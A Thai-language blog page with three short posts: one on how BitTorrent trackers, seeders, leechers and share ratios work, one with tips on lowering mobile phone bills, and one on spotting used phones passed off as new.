Tracker คือ เครื่องมือ หรือ โปรแกรมในเน็ตที่ทำหน้าที่จัดการประสานการระหว่างผู้ที่ต่อเข้า BitTorrent เมื่อคุณเปิดไฟล์ torrent ตัว client ก็จะติดต่อกับ tracker (ที่ระบุใน torrent) เพื่อขอรายชื่อผู้ที่อยู่ใน swarm ของไฟล์นั้นๆในปัจจุบัน ตัว tracker จะรู้ว่าสมาชิกของ swarm มีชิ้นส่วนไหนของไฟล์รวมทั้งสถานะของสมาชิกแต่ละคน หาก tracker เกิดขัดข้องก็จะไม่สามารถเริ่มโหลดไฟล์นั้นได้ แต่หากโหลดอยู่แล้วก็สามารถโหลดต่อได้

Tracker จะมี 2 แบบคือ
1.ระบบปิด ต้องเป็น Member คิด Ratio ส่วนมากจะเป็นระบบนี้ ข้อดีโหลดได้ไว คิด Ratio ทำให้คนอยากปล่อย
2.ระบบเปิด ไม่ต้องเป็น Member ไม่คิด Ratio เช่น Suprnova.org ข้อเสีย ปลิงเยอะ โหลดช้า


Seeders และ Leechers คืออะไร
Seeder เรียกง่ายๆ ว่า "ผู้แจก" มีหน้าที่แจกไฟล์ หรือ Upload เท่านั้น ไม่สามารถ Download ได้

Leecher เรียกง่ายๆ ว่า "ผู้โหลด" หรือ ตามคำแปลครับ "ปลิง" มีหน้าที่ดูดอย่างเดียว พร้อมกันนั้นทำหน้าที่แจกไฟล์ที่โหลดมาเสร็จแล้วบางส่วนไปในตัวด้วย ซึ่ง Torrent จะทำหน้าที่ในการแยกไฟล์ใหญ่ๆ ไฟล์หนึ่งออกเป็นหลายๆ ชิ้นด้วยกันเรียกได้ว่า Pieces

- ขณะที่คุณกำลัง Upload หรือ เป็นต้น seeder คนแรก ไม่ควร Leech ไฟล์อื่นๆ ควรจะรอให้คนอื่นๆ สามารถ Download จากคุณได้ครบ 100% ซะก่อน นอกจาก/หรือ มีผู้อื่นขยับฐานะจาก Leechers เป็น seeders ช่วยคุณก่อน แล้วจึงเริ่ม Download ไฟล์อื่นที่ต้องการ
- ขณะที่คุณทำหน้าที่เป็น Seeder นั้น คุณควรแจกไฟล์ หรือ ทำหน้าที่เป็น "ผู้แจก" ที่ดีให้ในปริมาณที่เท่าๆ กับที่คุณโหลด (Leech) มาจากคนอื่นๆ เช่น หากคุณโหลดมา 700MB คุณควรจะเปิดค้างไว้ปล่อยให้ทำการ Seed ต่อไปจนถึง 700MB เท่าๆ กับที่คุณโหลดมา
Ratio คืออะไร ทำไมต้องมี

Raito คือ ค่า Upload หาร Download = Ratio
เช่น หากค่า Upload ของคุณมีค่า 700 MB ค่า Download ของคุณมีค่า 900 MB
ให้นำ 700 หาร 900 จะได้ Raito = 0.875 (หรือ 87.5%)
นั่นคือคุณมีแต้มทั้งหมด 0.875 แต้ม เพื่อใช้ในการ Download ตามเงื่อนไขของ Tracker

ที่ต้องมี Ratio ก็เพื่อป้องกันปลิง(มาดูดอย่างเดียวไม่ยอมปล่อยให้คนอื่น)
ถ้ามีปลิงมากๆ ก็จะคล้าย P2P แบบเดิมคือมีแต่คนดูด ไม่มีคนปล่อย ทำให้โหลดไฟล์กันได้ช้ามากๆ
ส่วนมาก Tracker จะกำหนดต้องมี Ratio มากกว่า 0.3-0.5 ถึงจะสามารถโหลดไฟล์ใหม่ได้
Ratio ที่ดีคือ 1 หรือใกล้เคียง หมายความว่าคุณโหลดไฟล์มาเท่าไหร่ ก็ส่งต่อให้คนอื่นเท่านั้น

Bittorrent มีอะไรให้ดาวน์โหลดบ้าง?
มันก็ขึ้นอยู่กับผู้แชร์ว่าจะอัพโหลดอะไรขึ้นไปบ้างเพื่อแบ่งปันกับคนอื่น แต่ที่พบพานมาก็มีทุกๆประเภท ไม่ว่าจะเป็นเพลง, ละคร, ภาพยนตร์, การ์ตูน, โปรแกรม, อีบุ๊ค,
หนังสารคดีชีวิต ฯลฯ
เล่นเนต High Speed ควรเล่น Bittorrent เป็นอย่างยิ่ง!!
เพราะจะได้คุ้มค่าเงินที่คุณเหมาจ่ายไปยังไง
อัตราการดาวน์โหลดไฟล์โดยเฉลี่ยคิดดังนี้
256/128KBPS (สภาวะดาวน์โหลด/อัพโหลด) คิดความเร็วให้ทำการหารด้วย 8 จะได้ราวๆ 32KB/16KB ต่อ วินาที
512/256KBPS (สภาวะดาวน์โหลด/อัพโหลด) คิดความเร็วให้ทำการหารด้วย 8 จะได้ราวๆ 64KB/32KB ต่อ วินาที
1024/512KBPS (สภาวะดาวน์โหลด/อัพโหลด) คิดความเร็วให้ทำการหารด้วย 8 จะได้ราวๆ 128KB/64KB ต่อ วินาที
2048/512KBPS (สภาวะดาวน์โหลด/อัพโหลด) คิดความเร็วให้ทำการหารด้วย 8 จะได้ราวๆ 256KB/64KB ต่อ วินาที

* ความเร็วอาจจะได้มากหรือน้อยกว่านี้ก็เป็นได้ครับ ไม่แน่นอน...
ศัพท์น่าเรียนรู้สำหรับการใช้งานเวบแทรคเกอร์ (เวบผู้ให้บริการดาวน์โหลดทอเร้นท์)

PostHeaderIcon 5 เคล็ดไม่ลับประหยัดค่าโทรมือถือ ที่ใครๆ ก็ทำได้

1. อย่าลืมข้อดีของโทรศัพท์บ้าน :
การโทรโดยใช้โทรศัพท์บ้านถือว่าเป็นหนทางที่ช่วยประหยัดได้เป็นอย่างดี โดยเฉพาะหากต้องการโทรศัพท์เข้าไปยังหมายเลขโทรศัพท์บ้านด้วยกัน (ในพื้นที่เดียวกัน) หรือหมายเลขโทรศัพท์ PCT จะคุยนานแค่ไหนก็จ่ายแค่ 3 บาทต่อครั้งเท่านั้น

2. ลองเปลี่ยนไปใช้ระบบเติมเงิน :
การเปลี่ยนจากการใช้โปรโมชั่นประเภทเหมาจ่ายรายเดือน กับพฤติกรรมการใช้งานของบางคนอาจจะไม่ค่อยเหมาะสมหรือคุ้มเท่าไหร่นัก โดยเฉพาะผู้ที่โทรน้อย หรือผู้ที่มักจะลืมจ่ายค่าบริการรายเดือนอยู่เป็นประจำ ลองเปลี่ยนมาใช้แบบจ่ายก่อน โทรทีหลังบ้าง อาจจะช่วยให้สามารถหวนคิดถึงค่าโทรได้มากขึ้น เมื่อถึงเวลาที่เงินหมด และต้องเติมเงินใหม่

3. เลือกโปรโมชั่นที่เหมาะสมกับพฤติกรรมการใช้งานของตนเอง :
การเลือกโปรโมชั่นที่เหมาะสมกับพฤติกรรมการใช้งานของตนเอง นับว่าเป็นเรื่องที่สำคัญ อาจจะไม่ใช่ว่าต้องเลือกโปรโมชั่นที่มีราคาถูกที่สุด เพราะหากเป็นผู้ที่ต้องโทรออกมากๆ ก็อาจจะกลายเป็นว่าต้องเสียค่าบริการมากกว่าที่ควรจะเป็นเสียอีก เพราะโปรโมชั่นถูกๆ มักจะเหมาะกับผู้ที่ใช้โทรออกน้อย เน้นรับสายมาก ดังนั้นจึงต้องดูว่าตนเองมีพฤติกรรมการใช้งานเป็นอย่างไรเสียก่อน แล้วจึงเลือกโปรโมชั่นที่เหมาะสมที่สุดอีกครั้งหนึ่ง

4. หมั่นตรวจสอบยอดการโทรอยู่อย่างสม่ำเสมอ :
การหมั่นตรวจสอบยอดการโทรอยู่อย่างสม่ำเสมอนับว่าเป็นเรื่องที่สมควรทำสำหรับผู้ใช้บริการเครือข่ายทุกคน เนื่องจากจะได้สามารถตรวจสอบได้ว่าจนถึงขณะนั้น ได้มีการใช้บริการอะไรไปเท่าไหร่บ้างแล้ว หรือเหลือโปรโมชั่นให้ใช้ได้อีกเท่าไหร่ จะได้มีการวางแผนการใช้งานล่วงหน้าได้อย่างทันท่วงที

5. ยิงเบอร์ คำตอบสุดท้ายสำหรับบางคน :
การยิงเบอร์ หรือการโทรไปยังหมายเลขที่ต้องการให้มีสัญญาณเรียกเข้าระยะสั้นๆ (พยายามไม่ให้ผู้รับทำการกดปุ่มรับสายได้ทัน) ซึ่งมักจะนิยมใช้กันสำหรับผู้ที่ใช้ระบบเติมเงินอยู่ แล้วก็มักจะใช้กันในหมู่เพื่อนฝูงที่สนิทสนม คนรัก หรือพ่อแม่ญาติพี่น้อง ซึ่งวิธีนี้คงจะไม่สามารถใช้กันได้บ่อยๆ ให้ใช้เวลาจำเป็นเท่านั้น เพราะไม่เช่นนั้น อาจจะส่งผลร้ายต่อความสัมพันธ์อันดีกับคนรอบข้างได้เลยทีเดียว

จริงๆ แล้วมีวิธีอีกวิธีหนึ่งที่ไม่อยากแนะนำ เนื่องจากอาจจะดูเป็นพฤติกรรมที่ไม่ค่อยดีนัก นั่นคือการยืมเครื่องของผู้อื่นมาโทรเสียเลย โดยการอ้างเหตุผลต่างๆ นานา เช่น แบตหมด เครื่องเสีย โปรโมชั่นหมด ไม่มีสัญญาณ เครื่องมือถือเจ๋งดีอยากลองใช้ เงินหมด หรือ ลืมเอามือถือมา เป็นต้น ซึ่งถ้าเป็นเหตุผลที่ฟังขึ้น และนานๆ ที ก็คงจะไม่มีปัญหาแต่อย่างใด แต่ถ้าเป็นเหตุผลที่ฟังไม่ขึ้น และทำอยู่บ่อยๆ ก็คงจะโดนคนรอบข้างตีตัวออกห่างไปอย่างแน่นอน

PostHeaderIcon มือถือย้อมแมว หรือไม่ย้อมแมว เบื้องต้นจะสังเกตกันได้อย่างไร

มือถือย้อมแมวเป็นที่รู้กันว่าคือมือถือที่ทางร้านที่ไม่ประสงค์ดี เอาเครื่องเก่าที่ใช้งานแล้วมาทำให้ดูเหมือนเป็นเครื่องใหม่มือ 1 แล้วมาหลอกขายว่าเป็นเครื่องใหม่มือ 1 ซึ่งความเสี่ยงที่เครื่องนั้นจะมีปัญหาในการใช้งานก็ค่อนข้างมาก เนื่องจากแท้จริงเป็นเครื่องที่ผ่านการใช้งานมาแล้ว

เพราะฉะนั้นทางที่ดี ในเบื้องต้น ก่อนซื้อก็ควรจะดูว่าเครื่องมีสติ๊กเกอร์รับประกันจากศูนย์โดยตรงหรือไม่ เพราะหากไม่มีสติ๊กเกอร์รับประกันจากศูนย์ ก็ไม่สามารถรู้ถึงที่มาที่ไปของเครื่องนั้นได้เลย จากนั้นก็ดูตามขั้วต่อต่างๆ เช่นขั้วแบตเตอรี่ หรือที่ชาร์จไฟ รวมถึงแผงวงจร โดยอาจจะลองถอดแบตเตอรี่ออกมา แล้วมองเข้าไปด้านใน โดยมองในหลายๆ มุม ถ้าเป็นเครื่องใหม่มือ 1 จริงๆ ก็จะไม่มีร่องรอยของฝุ่น คราบสกปรก หรือคราบออกไซด์ติดอยู่ หลังจากนั้นหากเป็นรุ่นที่สามารถแกะหน้ากากออกมาได้ ก็ให้ดูที่แผงปุ่มกดว่าผ่านการใช้งานมาแล้วหรือไม่ และดูน็อตว่ามีร่องรอยการงัดแงะหรือการไขหรือไม่ ที่เหลือก็อาจจะเป็นการสังเกตลักษณะทั่วไป เช่นสีที่เคลือบหน้ากาก หรือตัวเครื่องต้องใหม่เอี่ยมเสมอกัน ไม่มีรอยขีดข่วน หรือมีการหลุดลอก เพียงเท่านี้ ก็พอทำให้มั่นใจในระดับหนึ่งแล้วว่า เครื่องที่เห็นอยู่นั้น ไม่ใช่เครื่องย้อมแมวนำมาหลอกขายอย่างแน่นอน

Direct Download Games

ผู้ติดตาม

ขับเคลื่อนโดย Blogger.